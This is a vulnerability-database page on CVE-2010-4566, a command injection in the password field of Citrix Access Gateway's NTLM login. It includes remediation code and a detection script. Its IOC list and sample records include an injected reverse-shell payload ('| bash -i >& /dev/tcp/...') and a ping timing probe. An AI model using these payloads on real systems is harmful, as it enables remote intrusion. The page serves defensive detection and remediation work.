CVE-2010-4566
published 2011-01-14

Priority P2 · 74 · critical · CVSS 2.0 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS 27.79% (97.8th percentile)
The web authentication form in the NT4 authentication component in Citrix Access Gateway Enterprise Edition 9.2-49.8 and earlier, and the NTLM authentication component in Access Gateway Standard and Advanced Editions before Access Gateway 5.0, allows attackers to execute arbitrary commands via shell metacharacters in the password field.
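The bug class behind that description, as an added illustration that is not code from the page's sources or from Citrix: a password spliced into a command string that is handed to `sh -c` (the page reports ntlm_authenticator spawning `sh -c /usr/local/samba/bin/samedit`) next to the same invocation made as an argv list with no shell. `echo` stands in for samedit so the block runs anywhere, and the `<helper> <user> <password>` argument layout is an assumption, not samedit's real syntax.

```python
import subprocess

# 'echo' stands in for /usr/local/samba/bin/samedit so the demo runs anywhere;
# the "<helper> <user> <password>" argument layout is assumed, not samedit's syntax.
AUTH_HELPER = "echo"


def auth_via_shell(username: str, password: str) -> str:
    """Vulnerable pattern: build one string and let sh -c parse it.
    '|', '&', ';', '$()', backticks and redirections in the password become
    shell syntax instead of data."""
    cmd = f"{AUTH_HELPER} {username} {password}"
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def auth_via_argv(username: str, password: str) -> str:
    """Hardened pattern: argv list, no shell. The password reaches the helper
    as exactly one argument, metacharacters and all."""
    argv = [AUTH_HELPER, username, password]
    return subprocess.run(argv, capture_output=True, text=True).stdout


if __name__ == "__main__":
    # A harmless injected pipeline; the payloads under Detection & IOCs use
    # the same '|' to start a reverse shell instead of tr.
    injected = "x | tr a-z A-Z"
    print(repr(auth_via_shell("alice", injected)))  # 'ALICE X\n': tr ran
    print(repr(auth_via_argv("alice", injected)))   # 'alice x | tr a-z A-Z\n'
```

The fix is the argv form, not input filtering: a deny-list of metacharacters is bypassable and also rejects legitimate passwords, while an argv list removes the shell parse step entirely, so `>&`, `0>&1` and a trailing `&` in the listed reverse-shell payload stay inert text.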

Affected (20 ranges)

Vendor   Product                           Version range   Fixed in
citrix   access_gateway                    <= 9.2-49.8
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   access_gateway
citrix   citrix_adm
citrix   citrix_hypervisor
citrix   citrix_virtual_apps_and_desktops
citrix   endpoint_management
citrix   netscaler_adc
citrix   netscaler_gateway
citrix   xenserver

Detection & IOCs (extracted from sources)

url      /
command  | bash -i >& /dev/tcp/<host>/<port> 0>&1 &
command  | ping -c 10 <host>
command  ping -c 10 127.0.0.1
path     /usr/local/samba/bin/samedit
path     /tmp/samedit-samuser-stdout.50474096
cookie   SESSION_TOKEN=1208473755272-1381414381
process  ntlm_authenticator
  • Detect shell metacharacter injection in the password field of the web authentication POST request: look for pipe characters ('|') or ampersands ('&') in the password parameter submitted to the login endpoint. Both characters are legal in ordinary passwords, so treat a match as a triage signal to correlate with the other indicators rather than as a block rule.
  • Monitor for the POST body pattern 'SESSION_TOKEN=1208473755272-1381414381&LoginType=Explicit' as a signature of exploit module activity against the Citrix Access Gateway login endpoint.
  • Detect timing-based probing: an attacker may inject '| ping -c 10 127.0.0.1' into the password field, which delays the authentication response by roughly 10 seconds and serves as a vulnerability check.
  • Monitor process execution on the Access Gateway for 'sh -c /usr/local/samba/bin/samedit' spawned by the ntlm_authenticator process, especially with unusual or injected arguments.
  • Alert on outbound TCP connections from the Access Gateway process (vpnadmin) to unexpected external hosts; these may indicate a reverse bash shell established via the injected payload '| bash -i >& /dev/tcp/<host>/<port> 0>&1 &'.
  • The vulnerability is only exploitable when the legacy NT4/NTLM authentication module (ntlm_authenticator) is enabled. Deployments not using this authentication type are not affected.
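The request-side checks in the list above, applied to constructed web-authentication POST records (an added example, not a detection rule from the page's sources). Assumptions: the login endpoint is the '/' listed under url, the form field is named `password`, and the record layout, client addresses and the benign SESSION_TOKEN value are made up; the exploit-signature token and payload strings are the ones listed above.

```python
import re
from urllib.parse import parse_qs, urlencode

# Indicators taken from the Detection & IOCs list above.
EXPLOIT_SESSION_TOKEN = "1208473755272-1381414381"
LOGIN_PATH = "/"                      # assumed: the url IOC listed above
PASSWORD_FIELD = "password"           # assumed form field name
SHELL_METACHARS = re.compile(r"[|&;`]|\$\(")
PING_PROBE = re.compile(r"\bping\s+-c\s+(\d+)")


def analyse_request(path: str, body: str, elapsed_ms: int) -> list:
    """Return the alert names one POST to the login endpoint triggers."""
    alerts = []
    if path != LOGIN_PATH:
        return alerts
    form = parse_qs(body, keep_blank_values=True)
    password = form.get(PASSWORD_FIELD, [""])[0]

    if SHELL_METACHARS.search(password):
        alerts.append("metachar-in-password")
    if (form.get("SESSION_TOKEN") == [EXPLOIT_SESSION_TOKEN]
            and form.get("LoginType") == ["Explicit"]):
        alerts.append("exploit-module-signature")
    probe = PING_PROBE.search(password)
    if probe:
        alerts.append("timing-probe")
        # 'ping -c N' stalls the authenticator for roughly N seconds, so a
        # matching response delay corroborates that the injection ran.
        if elapsed_ms >= (int(probe.group(1)) - 1) * 1000:
            alerts.append("delay-matches-probe")
    if "/dev/tcp/" in password:
        alerts.append("reverse-shell-payload")
    return alerts


# Constructed records: (client, path, response time in ms, form fields).
# 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges; the first
# SESSION_TOKEN is invented, the second is the value from the IOC list.
SAMPLE_RECORDS = [
    ("203.0.113.10", "/", 180,
     {"SESSION_TOKEN": "1294999200000-2063", "LoginType": "Explicit",
      "login": "jsmith", "password": "Summer2010!"}),
    ("203.0.113.44", "/", 10_042,
     {"SESSION_TOKEN": "1294999200000-2063", "LoginType": "Explicit",
      "login": "jsmith", "password": "x| ping -c 10 127.0.0.1"}),
    ("203.0.113.44", "/", 210,
     {"SESSION_TOKEN": EXPLOIT_SESSION_TOKEN, "LoginType": "Explicit",
      "login": "jsmith",
      "password": "| bash -i >& /dev/tcp/198.51.100.7/4444 0>&1 &"}),
]


def scan(records=SAMPLE_RECORDS) -> list:
    """Encode each record as the form body the gateway would see and analyse it."""
    return [(client, analyse_request(path, urlencode(fields), elapsed))
            for client, path, elapsed, fields in records]


if __name__ == "__main__":
    for client, alerts in scan():
        print(f"{client:15} {', '.join(alerts) or 'clean'}")
```

On its own, metachar-in-password is a triage signal, since '&' and '|' occur in genuine passwords; the timing correlation and the exploit-module token raise confidence, and the process-level indicator above (ntlm_authenticator spawning `sh -c /usr/local/samba/bin/samedit`) is the higher-fidelity detection. None of it applies to a gateway that does not have the NT4/NTLM authentication type enabled.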